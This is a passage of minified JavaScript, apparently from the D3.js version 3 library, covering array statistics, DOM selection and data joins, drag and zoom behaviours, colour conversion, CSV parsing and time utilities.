e=(n.length-1)*t+1,r=Math.floor(e),u=+n[r-1],i=e-r;return i?u+i*(n[r]-u):u},ta.median=function(n,t){var i,o=[],a=n.length,c=-1;if(1===arguments.length)for(;++c<a;)u(i=r(n[c]))&&o.push(i);else for(;++c<a;)u(i=r(t.call(n,n[c],c)))&&o.push(i);return o.length?ta.quantile(o.sort(e),.5):void 0},ta.variance=function(n,t){var e,i,o=n.length,a=0,c=0,l=-1,s=0;if(1===arguments.length)for(;++l<o;)u(e=r(n[l]))&&(i=e-a,a+=i/++s,c+=i*(e-a));else for(;++l<o;)u(e=r(t.call(n,n[l],l)))&&(i=e-a,a+=i/++s,c+=i*(e-a));return s>1?c/(s-1):void 0},ta.deviation=function(){var n=ta.variance.apply(this,arguments);return n?Math.sqrt(n):n};var ha=i(e);ta.bisectLeft=ha.left,ta.bisect=ta.bisectRight=ha.right,ta.bisector=function(n){return i(1===n.length?function(t,r){return e(n(t),r)}:n)},ta.shuffle=function(n,t,e){(i=arguments.length)<3&&(e=n.length,2>i&&(t=0));for(var r,u,i=e-t;i;)u=Math.random()*i--|0,r=n[i+t],n[i+t]=n[u+t],n[u+t]=r;return n},ta.permute=function(n,t){for(var e=t.length,r=new Array(e);e--;)r[e]=n[t[e]];return r},ta.pairs=function(n){for(var t,e=0,r=n.length-1,u=n[0],i=new Array(0>r?0:r);r>e;)i[e]=[t=u,u=n[++e]];return i},ta.zip=function(){if(!(r=arguments.length))return[];for(var n=-1,t=ta.min(arguments,o),e=new Array(t);++n<t;)for(var r,u=-1,i=e[n]=new Array(r);++u<r;)i[u]=arguments[u][n];return e},ta.transpose=function(n){return ta.zip.apply(ta,n)},ta.keys=function(n){var t=[];for(var e in n)t.push(e);return t},ta.values=function(n){var t=[];for(var e in n)t.push(n[e]);return t},ta.entries=function(n){var t=[];for(var e in n)t.push({key:e,value:n[e]});return t},ta.merge=function(n){for(var t,e,r,u=n.length,i=-1,o=0;++i<u;)o+=n[i].length;for(e=new Array(o);--u>=0;)for(r=n[u],t=r.length;--t>=0;)e[--o]=r[t];return e};var ga=Math.abs;ta.range=function(n,t,e){if(arguments.length<3&&(e=1,arguments.length<2&&(t=n,n=0)),(t-n)/e===1/0)throw new Error("infinite range");var r,u=[],i=a(ga(e)),o=-1;if(n*=i,t*=i,e*=i,0>e)for(;(r=n+e*++o)>t;)u.push(r/i);else for(;(r=n+e*++o)<t;)u.push(r/i);return u},ta.map=function(n,t){var e=new l;if(n instanceof l)n.forEach(function(n,t){e.set(n,t)});else if(Array.isArray(n)){var r,u=-1,i=n.length;if(1===arguments.length)for(;++u<i;)e.set(u,n[u]);else for(;++u<i;)e.set(t.call(n,r=n[u],u),r)}else for(var o in n)e.set(o,n[o]);return e};var pa="__proto__",va="\x00";c(l,{has:h,get:function(n){return this._[s(n)]},set:function(n,t){return this._[s(n)]=t},remove:g,keys:p,values:function(){var n=[];for(var t in this._)n.push(this._[t]);return n},entries:function(){var n=[];for(var t in this._)n.push({key:f(t),value:this._[t]});return n},size:v,empty:d,forEach:function(n){for(var t in this._)n.call(this,f(t),this._[t])}}),ta.nest=function(){function n(t,o,a){if(a>=i.length)return r?r.call(u,o):e?o.sort(e):o;for(var c,s,f,h,g=-1,p=o.length,v=i[a++],d=new l;++g<p;)(h=d.get(c=v(s=o[g])))?h.push(s):d.set(c,[s]);return t?(s=t(),f=function(e,r){s.set(e,n(t,r,a))}):(s={},f=function(e,r){s[e]=n(t,r,a)}),d.forEach(f),s}function t(n,e){if(e>=i.length)return n;var r=[],u=o[e++];return n.forEach(function(n,u){r.push({key:n,values:t(u,e)})}),u?r.sort(function(n,t){return u(n.key,t.key)}):r}var e,r,u={},i=[],o=[];return u.map=function(t,e){return n(e,t,0)},u.entries=function(e){return t(n(ta.map,e,0),0)},u.key=function(n){return i.push(n),u},u.sortKeys=function(n){return o[i.length-1]=n,u},u.sortValues=function(n){return e=n,u},u.rollup=function(n){return r=n,u},u},ta.set=function(n){var t=new m;if(n)for(var e=0,r=n.length;r>e;++e)t.add(n[e]);return t},c(m,{has:h,add:function(n){return this._[s(n+="")]=!0,n},remove:g,values:p,size:v,empty:d,forEach:function(n){for(var t in this._)n.call(this,f(t))}}),ta.behavior={},ta.rebind=function(n,t){for(var e,r=1,u=arguments.length;++r<u;)n[e=arguments[r]]=M(n,t,t[e]);return n};var da=["webkit","ms","moz","Moz","o","O"];ta.dispatch=function(){for(var n=new _,t=-1,e=arguments.length;++t<e;)n[arguments[t]]=w(n);return n},_.prototype.on=function(n,t){var e=n.indexOf("."),r="";if(e>=0&&(r=n.slice(e+1),n=n.slice(0,e)),n)return arguments.length<2?this[n].on(r):this[n].on(r,t);if(2===arguments.length){if(null==t)for(n in this)this.hasOwnProperty(n)&&this[n].on(r,null);return this}},ta.event=null,ta.requote=function(n){return n.replace(ma,"\\$&")};var ma=/[\\\^\$\*\+\?\|\[\]\(\)\.\{\}]/g,ya={}.__proto__?function(n,t){n.__proto__=t}:function(n,t){for(var e in t)n[e]=t[e]},Ma=function(n,t){return t.querySelector(n)},xa=function(n,t){return t.querySelectorAll(n)},ba=function(n,t){var e=n.matches||n[x(n,"matchesSelector")];return(ba=function(n,t){return e.call(n,t)})(n,t)};"function"==typeof Sizzle&&(Ma=function(n,t){return Sizzle(n,t)[0]||null},xa=Sizzle,ba=Sizzle.matchesSelector),ta.selection=function(){return ta.select(ua.documentElement)};var _a=ta.selection.prototype=[];_a.select=function(n){var t,e,r,u,i=[];n=N(n);for(var o=-1,a=this.length;++o<a;){i.push(t=[]),t.parentNode=(r=this[o]).parentNode;for(var c=-1,l=r.length;++c<l;)(u=r[c])?(t.push(e=n.call(u,u.__data__,c,o)),e&&"__data__"in u&&(e.__data__=u.__data__)):t.push(null)}return A(i)},_a.selectAll=function(n){var t,e,r=[];n=C(n);for(var u=-1,i=this.length;++u<i;)for(var o=this[u],a=-1,c=o.length;++a<c;)(e=o[a])&&(r.push(t=ra(n.call(e,e.__data__,a,u))),t.parentNode=e);return A(r)};var wa={svg:"http://www.w3.org/2000/svg",xhtml:"http://www.w3.org/1999/xhtml",xlink:"http://www.w3.org/1999/xlink",xml:"http://www.w3.org/XML/1998/namespace",xmlns:"http://www.w3.org/2000/xmlns/"};ta.ns={prefix:wa,qualify:function(n){var t=n.indexOf(":"),e=n;return t>=0&&(e=n.slice(0,t),n=n.slice(t+1)),wa.hasOwnProperty(e)?{space:wa[e],local:n}:n}},_a.attr=function(n,t){if(arguments.length<2){if("string"==typeof n){var e=this.node();return n=ta.ns.qualify(n),n.local?e.getAttributeNS(n.space,n.local):e.getAttribute(n)}for(t in n)this.each(z(t,n[t]));return this}return this.each(z(n,t))},_a.classed=function(n,t){if(arguments.length<2){if("string"==typeof n){var e=this.node(),r=(n=T(n)).length,u=-1;if(t=e.classList){for(;++u<r;)if(!t.contains(n[u]))return!1}else for(t=e.getAttribute("class");++u<r;)if(!L(n[u]).test(t))return!1;return!0}for(t in n)this.each(R(t,n[t]));return this}return this.each(R(n,t))},_a.style=function(n,e,r){var u=arguments.length;if(3>u){if("string"!=typeof n){2>u&&(e="");for(r in n)this.each(P(r,n[r],e));return this}if(2>u){var i=this.node();return t(i).getComputedStyle(i,null).getPropertyValue(n)}r=""}return this.each(P(n,e,r))},_a.property=function(n,t){if(arguments.length<2){if("string"==typeof n)return this.node()[n];for(t in n)this.each(U(t,n[t]));return this}return this.each(U(n,t))},_a.text=function(n){return arguments.length?this.each("function"==typeof n?function(){var t=n.apply(this,arguments);this.textContent=null==t?"":t}:null==n?function(){this.textContent=""}:function(){this.textContent=n}):this.node().textContent},_a.html=function(n){return arguments.length?this.each("function"==typeof n?function(){var t=n.apply(this,arguments);this.innerHTML=null==t?"":t}:null==n?function(){this.innerHTML=""}:function(){this.innerHTML=n}):this.node().innerHTML},_a.append=function(n){return n=j(n),this.select(function(){return this.appendChild(n.apply(this,arguments))})},_a.insert=function(n,t){return n=j(n),t=N(t),this.select(function(){return this.insertBefore(n.apply(this,arguments),t.apply(this,arguments)||null)})},_a.remove=function(){return this.each(F)},_a.data=function(n,t){function e(n,e){var r,u,i,o=n.length,f=e.length,h=Math.min(o,f),g=new Array(f),p=new Array(f),v=new Array(o);if(t){var d,m=new l,y=new Array(o);for(r=-1;++r<o;)m.has(d=t.call(u=n[r],u.__data__,r))?v[r]=u:m.set(d,u),y[r]=d;for(r=-1;++r<f;)(u=m.get(d=t.call(e,i=e[r],r)))?u!==!0&&(g[r]=u,u.__data__=i):p[r]=H(i),m.set(d,!0);for(r=-1;++r<o;)m.get(y[r])!==!0&&(v[r]=n[r])}else{for(r=-1;++r<h;)u=n[r],i=e[r],u?(u.__data__=i,g[r]=u):p[r]=H(i);for(;f>r;++r)p[r]=H(e[r]);for(;o>r;++r)v[r]=n[r]}p.update=g,p.parentNode=g.parentNode=v.parentNode=n.parentNode,a.push(p),c.push(g),s.push(v)}var r,u,i=-1,o=this.length;if(!arguments.length){for(n=new Array(o=(r=this[0]).length);++i<o;)(u=r[i])&&(n[i]=u.__data__);return n}var a=Z([]),c=A([]),s=A([]);if("function"==typeof n)for(;++i<o;)e(r=this[i],n.call(r,r.parentNode.__data__,i));else for(;++i<o;)e(r=this[i],n);return c.enter=function(){return a},c.exit=function(){return s},c},_a.datum=function(n){return arguments.length?this.property("__data__",n):this.property("__data__")},_a.filter=function(n){var t,e,r,u=[];"function"!=typeof n&&(n=O(n));for(var i=0,o=this.length;o>i;i++){u.push(t=[]),t.parentNode=(e=this[i]).parentNode;for(var a=0,c=e.length;c>a;a++)(r=e[a])&&n.call(r,r.__data__,a,i)&&t.push(r)}return A(u)},_a.order=function(){for(var n=-1,t=this.length;++n<t;)for(var e,r=this[n],u=r.length-1,i=r[u];--u>=0;)(e=r[u])&&(i&&i!==e.nextSibling&&i.parentNode.insertBefore(e,i),i=e);return this},_a.sort=function(n){n=I.apply(this,arguments);for(var t=-1,e=this.length;++t<e;)this[t].sort(n);return this.order()},_a.each=function(n){return Y(this,function(t,e,r){n.call(t,t.__data__,e,r)})},_a.call=function(n){var t=ra(arguments);return n.apply(t[0]=this,t),this},_a.empty=function(){return!this.node()},_a.node=function(){for(var n=0,t=this.length;t>n;n++)for(var e=this[n],r=0,u=e.length;u>r;r++){var i=e[r];if(i)return i}return null},_a.size=function(){var n=0;return Y(this,function(){++n}),n};var Sa=[];ta.selection.enter=Z,ta.selection.enter.prototype=Sa,Sa.append=_a.append,Sa.empty=_a.empty,Sa.node=_a.node,Sa.call=_a.call,Sa.size=_a.size,Sa.select=function(n){for(var t,e,r,u,i,o=[],a=-1,c=this.length;++a<c;){r=(u=this[a]).update,o.push(t=[]),t.parentNode=u.parentNode;for(var l=-1,s=u.length;++l<s;)(i=u[l])?(t.push(r[l]=e=n.call(u.parentNode,i.__data__,l,a)),e.__data__=i.__data__):t.push(null)}return A(o)},Sa.insert=function(n,t){return arguments.length<2&&(t=V(this)),_a.insert.call(this,n,t)},ta.select=function(t){var e;return"string"==typeof t?(e=[Ma(t,ua)],e.parentNode=ua.documentElement):(e=[t],e.parentNode=n(t)),A([e])},ta.selectAll=function(n){var t;return"string"==typeof n?(t=ra(xa(n,ua)),t.parentNode=ua.documentElement):(t=n,t.parentNode=null),A([t])},_a.on=function(n,t,e){var r=arguments.length;if(3>r){if("string"!=typeof n){2>r&&(t=!1);for(e in n)this.each(X(e,n[e],t));return this}if(2>r)return(r=this.node()["__on"+n])&&r._;e=!1}return this.each(X(n,t,e))};var ka=ta.map({mouseenter:"mouseover",mouseleave:"mouseout"});ua&&ka.forEach(function(n){"on"+n in ua&&ka.remove(n)});var Ea,Aa=0;ta.mouse=function(n){return J(n,k())};var Na=this.navigator&&/WebKit/.test(this.navigator.userAgent)?-1:0;ta.touch=function(n,t,e){if(arguments.length<3&&(e=t,t=k().changedTouches),t)for(var r,u=0,i=t.length;i>u;++u)if((r=t[u]).identifier===e)return J(n,r)},ta.behavior.drag=function(){function n(){this.on("mousedown.drag",i).on("touchstart.drag",o)}function e(n,t,e,i,o){return function(){function a(){var n,e,r=t(h,v);r&&(n=r[0]-M[0],e=r[1]-M[1],p|=n|e,M=r,g({type:"drag",x:r[0]+l[0],y:r[1]+l[1],dx:n,dy:e}))}function c(){t(h,v)&&(m.on(i+d,null).on(o+d,null),y(p&&ta.event.target===f),g({type:"dragend"}))}var l,s=this,f=ta.event.target,h=s.parentNode,g=r.of(s,arguments),p=0,v=n(),d=".drag"+(null==v?"":"-"+v),m=ta.select(e(f)).on(i+d,a).on(o+d,c),y=W(f),M=t(h,v);u?(l=u.apply(s,arguments),l=[l.x-M[0],l.y-M[1]]):l=[0,0],g({type:"dragstart"})}}var r=E(n,"drag","dragstart","dragend"),u=null,i=e(b,ta.mouse,t,"mousemove","mouseup"),o=e(G,ta.touch,y,"touchmove","touchend");return n.origin=function(t){return arguments.length?(u=t,n):u},ta.rebind(n,r,"on")},ta.touches=function(n,t){return arguments.length<2&&(t=k().touches),t?ra(t).map(function(t){var e=J(n,t);return e.identifier=t.identifier,e}):[]};var Ca=1e-6,za=Ca*Ca,qa=Math.PI,La=2*qa,Ta=La-Ca,Ra=qa/2,Da=qa/180,Pa=180/qa,Ua=Math.SQRT2,ja=2,Fa=4;ta.interpolateZoom=function(n,t){function e(n){var t=n*y;if(m){var e=rt(v),o=i/(ja*h)*(e*ut(Ua*t+v)-et(v));return[r+o*l,u+o*s,i*e/rt(Ua*t+v)]}return[r+n*l,u+n*s,i*Math.exp(Ua*t)]}var r=n[0],u=n[1],i=n[2],o=t[0],a=t[1],c=t[2],l=o-r,s=a-u,f=l*l+s*s,h=Math.sqrt(f),g=(c*c-i*i+Fa*f)/(2*i*ja*h),p=(c*c-i*i-Fa*f)/(2*c*ja*h),v=Math.log(Math.sqrt(g*g+1)-g),d=Math.log(Math.sqrt(p*p+1)-p),m=d-v,y=(m||Math.log(c/i))/Ua;return e.duration=1e3*y,e},ta.behavior.zoom=function(){function n(n){n.on(q,f).on(Oa+".zoom",g).on("dblclick.zoom",p).on(R,h)}function e(n){return[(n[0]-k.x)/k.k,(n[1]-k.y)/k.k]}function r(n){return[n[0]*k.k+k.x,n[1]*k.k+k.y]}function u(n){k.k=Math.max(N[0],Math.min(N[1],n))}function i(n,t){t=r(t),k.x+=n[0]-t[0],k.y+=n[1]-t[1]}function o(t,e,r,o){t.__chart__={x:k.x,y:k.y,k:k.k},u(Math.pow(2,o)),i(d=e,r),t=ta.select(t),C>0&&(t=t.transition().duration(C)),t.call(n.event)}function a(){b&&b.domain(x.range().map(function(n){return(n-k.x)/k.k}).map(x.invert)),w&&w.domain(_.range().map(function(n){return(n-k.y)/k.k}).map(_.invert))}function c(n){z++||n({type:"zoomstart"})}function l(n){a(),n({type:"zoom",scale:k.k,translate:[k.x,k.y]})}function s(n){--z||n({type:"zoomend"}),d=null}function f(){function n(){f=1,i(ta.mouse(u),g),l(a)}function r(){h.on(L,null).on(T,null),p(f&&ta.event.target===o),s(a)}var u=this,o=ta.event.target,a=D.of(u,arguments),f=0,h=ta.select(t(u)).on(L,n).on(T,r),g=e(ta.mouse(u)),p=W(u);Dl.call(u),c(a)}function h(){function n(){var n=ta.touches(p);return g=k.k,n.forEach(function(n){n.identifier in d&&(d[n.identifier]=e(n))}),n}function t(){var t=ta.event.target;ta.select(t).on(x,r).on(b,a),_.push(t);for(var e=ta.event.changedTouches,u=0,i=e.length;i>u;++u)d[e[u].identifier]=null;var c=n(),l=Date.now();if(1===c.length){if(500>l-M){var s=c[0];o(p,s,d[s.identifier],Math.floor(Math.log(k.k)/Math.LN2)+1),S()}M=l}else if(c.length>1){var s=c[0],f=c[1],h=s[0]-f[0],g=s[1]-f[1];m=h*h+g*g}}function r(){var n,t,e,r,o=ta.touches(p);Dl.call(p);for(var a=0,c=o.length;c>a;++a,r=null)if(e=o[a],r=d[e.identifier]){if(t)break;n=e,t=r}if(r){var s=(s=e[0]-n[0])*s+(s=e[1]-n[1])*s,f=m&&Math.sqrt(s/m);n=[(n[0]+e[0])/2,(n[1]+e[1])/2],t=[(t[0]+r[0])/2,(t[1]+r[1])/2],u(f*g)}M=null,i(n,t),l(v)}function a(){if(ta.event.touches.length){for(var t=ta.event.changedTouches,e=0,r=t.length;r>e;++e)delete d[t[e].identifier];for(var u in d)return void n()}ta.selectAll(_).on(y,null),w.on(q,f).on(R,h),E(),s(v)}var g,p=this,v=D.of(p,arguments),d={},m=0,y=".zoom-"+ta.event.changedTouches[0].identifier,x="touchmove"+y,b="touchend"+y,_=[],w=ta.select(p),E=W(p);t(),c(v),w.on(q,null).on(R,t)}function g(){var n=D.of(this,arguments);y?clearTimeout(y):(v=e(d=m||ta.mouse(this)),Dl.call(this),c(n)),y=setTimeout(function(){y=null,s(n)},50),S(),u(Math.pow(2,.002*Ha())*k.k),i(d,v),l(n)}function p(){var n=ta.mouse(this),t=Math.log(k.k)/Math.LN2;o(this,n,e(n),ta.event.shiftKey?Math.ceil(t)-1:Math.floor(t)+1)}var v,d,m,y,M,x,b,_,w,k={x:0,y:0,k:1},A=[960,500],N=Ia,C=250,z=0,q="mousedown.zoom",L="mousemove.zoom",T="mouseup.zoom",R="touchstart.zoom",D=E(n,"zoomstart","zoom","zoomend");return Oa||(Oa="onwheel"in ua?(Ha=function(){return-ta.event.deltaY*(ta.event.deltaMode?120:1)},"wheel"):"onmousewheel"in ua?(Ha=function(){return ta.event.wheelDelta},"mousewheel"):(Ha=function(){return-ta.event.detail},"MozMousePixelScroll")),n.event=function(n){n.each(function(){var n=D.of(this,arguments),t=k;Tl?ta.select(this).transition().each("start.zoom",function(){k=this.__chart__||{x:0,y:0,k:1},c(n)}).tween("zoom:zoom",function(){var e=A[0],r=A[1],u=d?d[0]:e/2,i=d?d[1]:r/2,o=ta.interpolateZoom([(u-k.x)/k.k,(i-k.y)/k.k,e/k.k],[(u-t.x)/t.k,(i-t.y)/t.k,e/t.k]);return function(t){var r=o(t),a=e/r[2];this.__chart__=k={x:u-r[0]*a,y:i-r[1]*a,k:a},l(n)}}).each("interrupt.zoom",function(){s(n)}).each("end.zoom",function(){s(n)}):(this.__chart__=k,c(n),l(n),s(n))})},n.translate=function(t){return arguments.length?(k={x:+t[0],y:+t[1],k:k.k},a(),n):[k.x,k.y]},n.scale=function(t){return arguments.length?(k={x:k.x,y:k.y,k:+t},a(),n):k.k},n.scaleExtent=function(t){return arguments.length?(N=null==t?Ia:[+t[0],+t[1]],n):N},n.center=function(t){return arguments.length?(m=t&&[+t[0],+t[1]],n):m},n.size=function(t){return arguments.length?(A=t&&[+t[0],+t[1]],n):A},n.duration=function(t){return arguments.length?(C=+t,n):C},n.x=function(t){return arguments.length?(b=t,x=t.copy(),k={x:0,y:0,k:1},n):b},n.y=function(t){return arguments.length?(w=t,_=t.copy(),k={x:0,y:0,k:1},n):w},ta.rebind(n,D,"on")};var Ha,Oa,Ia=[0,1/0];ta.color=ot,ot.prototype.toString=function(){return this.rgb()+""},ta.hsl=at;var Ya=at.prototype=new ot;Ya.brighter=function(n){return n=Math.pow(.7,arguments.length?n:1),new at(this.h,this.s,this.l/n)},Ya.darker=function(n){return n=Math.pow(.7,arguments.length?n:1),new at(this.h,this.s,n*this.l)},Ya.rgb=function(){return ct(this.h,this.s,this.l)},ta.hcl=lt;var Za=lt.prototype=new ot;Za.brighter=function(n){return new lt(this.h,this.c,Math.min(100,this.l+Va*(arguments.length?n:1)))},Za.darker=function(n){return new lt(this.h,this.c,Math.max(0,this.l-Va*(arguments.length?n:1)))},Za.rgb=function(){return st(this.h,this.c,this.l).rgb()},ta.lab=ft;var Va=18,Xa=.95047,$a=1,Ba=1.08883,Wa=ft.prototype=new ot;Wa.brighter=function(n){return new ft(Math.min(100,this.l+Va*(arguments.length?n:1)),this.a,this.b)},Wa.darker=function(n){return new ft(Math.max(0,this.l-Va*(arguments.length?n:1)),this.a,this.b)},Wa.rgb=function(){return ht(this.l,this.a,this.b)},ta.rgb=mt;var Ja=mt.prototype=new ot;Ja.brighter=function(n){n=Math.pow(.7,arguments.length?n:1);var t=this.r,e=this.g,r=this.b,u=30;return t||e||r?(t&&u>t&&(t=u),e&&u>e&&(e=u),r&&u>r&&(r=u),new mt(Math.min(255,t/n),Math.min(255,e/n),Math.min(255,r/n))):new mt(u,u,u)},Ja.darker=function(n){return n=Math.pow(.7,arguments.length?n:1),new mt(n*this.r,n*this.g,n*this.b)},Ja.hsl=function(){return _t(this.r,this.g,this.b)},Ja.toString=function(){return"#"+xt(this.r)+xt(this.g)+xt(this.b)};var Ga=ta.map({aliceblue:15792383,antiquewhite:16444375,aqua:65535,aquamarine:8388564,azure:15794175,beige:16119260,bisque:16770244,black:0,blanchedalmond:16772045,blue:255,blueviolet:9055202,brown:10824234,burlywood:14596231,cadetblue:6266528,chartreuse:8388352,chocolate:13789470,coral:16744272,cornflowerblue:6591981,cornsilk:16775388,crimson:14423100,cyan:65535,darkblue:139,darkcyan:35723,darkgoldenrod:12092939,darkgray:11119017,darkgreen:25600,darkgrey:11119017,darkkhaki:12433259,darkmagenta:9109643,darkolivegreen:5597999,darkorange:16747520,darkorchid:10040012,darkred:9109504,darksalmon:15308410,darkseagreen:9419919,darkslateblue:4734347,darkslategray:3100495,darkslategrey:3100495,darkturquoise:52945,darkviolet:9699539,deeppink:16716947,deepskyblue:49151,dimgray:6908265,dimgrey:6908265,dodgerblue:2003199,firebrick:11674146,floralwhite:16775920,forestgreen:2263842,fuchsia:16711935,gainsboro:14474460,ghostwhite:16316671,gold:16766720,goldenrod:14329120,gray:8421504,green:32768,greenyellow:11403055,grey:8421504,honeydew:15794160,hotpink:16738740,indianred:13458524,indigo:4915330,ivory:16777200,khaki:15787660,lavender:15132410,lavenderblush:16773365,lawngreen:8190976,lemonchiffon:16775885,lightblue:11393254,lightcoral:15761536,lightcyan:14745599,lightgoldenrodyellow:16448210,lightgray:13882323,lightgreen:9498256,lightgrey:13882323,lightpink:16758465,lightsalmon:16752762,lightseagreen:2142890,lightskyblue:8900346,lightslategray:7833753,lightslategrey:7833753,lightsteelblue:11584734,lightyellow:16777184,lime:65280,limegreen:3329330,linen:16445670,magenta:16711935,maroon:8388608,mediumaquamarine:6737322,mediumblue:205,mediumorchid:12211667,mediumpurple:9662683,mediumseagreen:3978097,mediumslateblue:8087790,mediumspringgreen:64154,mediumturquoise:4772300,mediumvioletred:13047173,midnightblue:1644912,mintcream:16121850,mistyrose:16770273,moccasin:16770229,navajowhite:16768685,navy:128,oldlace:16643558,olive:8421376,olivedrab:7048739,orange:16753920,orangered:16729344,orchid:14315734,palegoldenrod:15657130,palegreen:10025880,paleturquoise:11529966,palevioletred:14381203,papayawhip:16773077,peachpuff:16767673,peru:13468991,pink:16761035,plum:14524637,powderblue:11591910,purple:8388736,rebeccapurple:6697881,red:16711680,rosybrown:12357519,royalblue:4286945,saddlebrown:9127187,salmon:16416882,sandybrown:16032864,seagreen:3050327,seashell:16774638,sienna:10506797,silver:12632256,skyblue:8900331,slateblue:6970061,slategray:7372944,slategrey:7372944,snow:16775930,springgreen:65407,steelblue:4620980,tan:13808780,teal:32896,thistle:14204888,tomato:16737095,turquoise:4251856,violet:15631086,wheat:16113331,white:16777215,whitesmoke:16119285,yellow:16776960,yellowgreen:10145074});Ga.forEach(function(n,t){Ga.set(n,yt(t))}),ta.functor=Et,ta.xhr=At(y),ta.dsv=function(n,t){function e(n,e,i){arguments.length<3&&(i=e,e=null);var o=Nt(n,t,null==e?r:u(e),i);return o.row=function(n){return arguments.length?o.response(null==(e=n)?r:u(n)):e},o}function r(n){return e.parse(n.responseText)}function u(n){return function(t){return e.parse(t.responseText,n)}}function i(t){return t.map(o).join(n)}function o(n){return a.test(n)?'"'+n.replace(/\"/g,'""')+'"':n}var a=new RegExp('["'+n+"\n]"),c=n.charCodeAt(0);return e.parse=function(n,t){var r;return e.parseRows(n,function(n,e){if(r)return r(n,e-1);var u=new Function("d","return {"+n.map(function(n,t){return JSON.stringify(n)+": d["+t+"]"}).join(",")+"}");r=t?function(n,e){return t(u(n),e)}:u})},e.parseRows=function(n,t){function e(){if(s>=l)return o;if(u)return u=!1,i;var t=s;if(34===n.charCodeAt(t)){for(var e=t;e++<l;)if(34===n.charCodeAt(e)){if(34!==n.charCodeAt(e+1))break;++e}s=e+2;var r=n.charCodeAt(e+1);return 13===r?(u=!0,10===n.charCodeAt(e+2)&&++s):10===r&&(u=!0),n.slice(t+1,e).replace(/""/g,'"')}for(;l>s;){var r=n.charCodeAt(s++),a=1;if(10===r)u=!0;else if(13===r)u=!0,10===n.charCodeAt(s)&&(++s,++a);else if(r!==c)continue;return n.slice(t,s-a)}return n.slice(t)}for(var r,u,i={},o={},a=[],l=n.length,s=0,f=0;(r=e())!==o;){for(var h=[];r!==i&&r!==o;)h.push(r),r=e();t&&null==(h=t(h,f++))||a.push(h)}return a},e.format=function(t){if(Array.isArray(t[0]))return e.formatRows(t);var r=new m,u=[];return t.forEach(function(n){for(var t in n)r.has(t)||u.push(r.add(t))}),[u.map(o).join(n)].concat(t.map(function(t){return u.map(function(n){return o(t[n])}).join(n)})).join("\n")},e.formatRows=function(n){return n.map(i).join("\n")},e},ta.csv=ta.dsv(",","text/csv"),ta.tsv=ta.dsv("	","text/tab-separated-values");var Ka,Qa,nc,tc,ec,rc=this[x(this,"requestAnimationFrame")]||function(n){setTimeout(n,17)};ta.timer=function(n,t,e){var r=arguments.length;2>r&&(t=0),3>r&&(e=Date.now());var u=e+t,i={c:n,t:u,f:!1,n:null};Qa?Qa.n=i:Ka=i,Qa=i,nc||(tc=clearTimeout(tc),nc=1,rc(qt))},ta.timer.flush=function(){Lt(),Tt()},ta.round=function(n,t){return t?Math.round(n*(t=Math.pow(10,t)))/t:Math.round(n)};var uc=["y","z","a","f","p","n","\xb5","m","","k","M","G","T","P","E","Z","Y"].map(Dt);ta.formatPrefix=function(n,t){var e=0;return n&&(0>n&&(n*=-1),t&&(n=ta.round(n,Rt(n,t))),e=1+Math.floor(1e-12+Math.log(n)/Math.LN10),e=Math.max(-24,Math.min(24,3*Math.floor((e-1)/3)))),uc[8+e/3]};var ic=/(?:([^{])?([<>=^]))?([+\- ])?([$#])?(0)?(\d+)?(,)?(\.-?\d+)?([a-z%])?/i,oc=ta.map({b:function(n){return n.toString(2)},c:function(n){return String.fromCharCode(n)},o:function(n){return n.toString(8)},x:function(n){return n.toString(16)},X:function(n){return n.toString(16).toUpperCase()},g:function(n,t){return n.toPrecision(t)},e:function(n,t){return n.toExponential(t)},f:function(n,t){return n.toFixed(t)},r:function(n,t){return(n=ta.round(n,Rt(n,t))).toFixed(Math.max(0,Math.min(20,Rt(n*(1+1e-15),t))))}}),ac=ta.time={},cc=Date;jt.prototype={getDate:function(){return this._.getUTCDate()},getDay:function(){return this._.getUTCDay()},getFullYear:function(){return this._.getUTCFullYear()},getHours:function(){return this._.getUTCHours()},getMilliseconds:function(){return this._.getUTCMilliseconds()},getMinutes:function(){return this._.getUTCMinutes()},getMonth:function(){return this._.getUTCMonth()},getSeconds:function(){return this._.getUTCSeconds()},getTime:function(){return this._.getTime()},getTimezoneOffset:function(){return 0},valueOf:function(){return this._.valueOf()},setDate:function(){lc.setUTCDate.apply(this._,arguments)},setDay:function(){lc.setUTCDay.apply(this._,arguments)},setFullYear:function(){lc.setUTCFullYear.apply(this._,arguments)},setHours:function(){lc.setUTCHours.apply(this._,arguments)},setMilliseconds:function(){lc.setUTCMilliseconds.apply(this._,arguments)},setMinutes:function(){lc.setUTCMinutes.apply(this._,arguments)},setMonth:function(){lc.setUTCMonth.apply(this._,arguments)},setSeconds:function(){lc.setUTCSeconds.apply(this._,arguments)},setTime:function(){lc.setTime.apply(this._,arguments)}};var lc=Date.prototype;ac.year=Ft(function(n){return n=ac.day(n),n.setMonth(0,1),n},function(n,t){n.setFullYear(n.getFullYear()+t)},function(n){return n.getFullYear()}),ac.years=ac.year.range,ac.years.utc=ac.year.utc.range,ac.day=Ft(function(n){var t=new cc(2e3,0);return t.setFullYear(n.getFullYear(),n.getMonth(),n.getDate()),t},function(n,t){n.setDate(n.getDate()+t)},function(n){return n.getDate()-1}),ac.days=ac.day.range,ac.days.utc=ac.day.utc.range,ac.dayOfYear=function(n){var t=ac.year(n);return Math.floor((n-t-6e4*(n.getTimezoneOffset()-t.getTimezoneOffset()))/864e5)},["sunday","monday","tuesday","wednesday","thursday","friday","saturday"].forEach(function(n,t){t=7-t;var e=ac[n]=Ft(function(n){return(n=ac.day(n)).setDate(n.getDate()-(n.getDay()+t)%7),n},function(n,t){n.setDate(n.getDate()+7*Math.floor(t))},function(n){var e=ac.year(n).getDay();return Math.floor((ac.dayOfYear(n)+(e+t)%7)/7)-(e!==t)});ac[n+"s"]=e.range,ac[n+"s"].utc=e.utc.range,ac[n+"OfYear"]=function(n){var e=ac.year(n).getDay();return Math.floor((ac.dayOfYear(n)+(e+t)%7)/7)}}),ac.week=ac.sunday,ac.weeks=ac.sunday.range,ac.weeks.utc=ac.sunday.utc.range,ac.weekOfYear=ac.sundayOfYear;var sc={"-":"",_:" ",0:"0"},fc=/^\s*\d+/,hc=/^%/;ta.locale=function(n){return{numberFormat:Pt(n),timeFormat:Ot(n)}};var gc=ta.locale({decimal:".",thousands:",",grouping:[3],currency:["$",""],dateTime:"%a %b %e %X 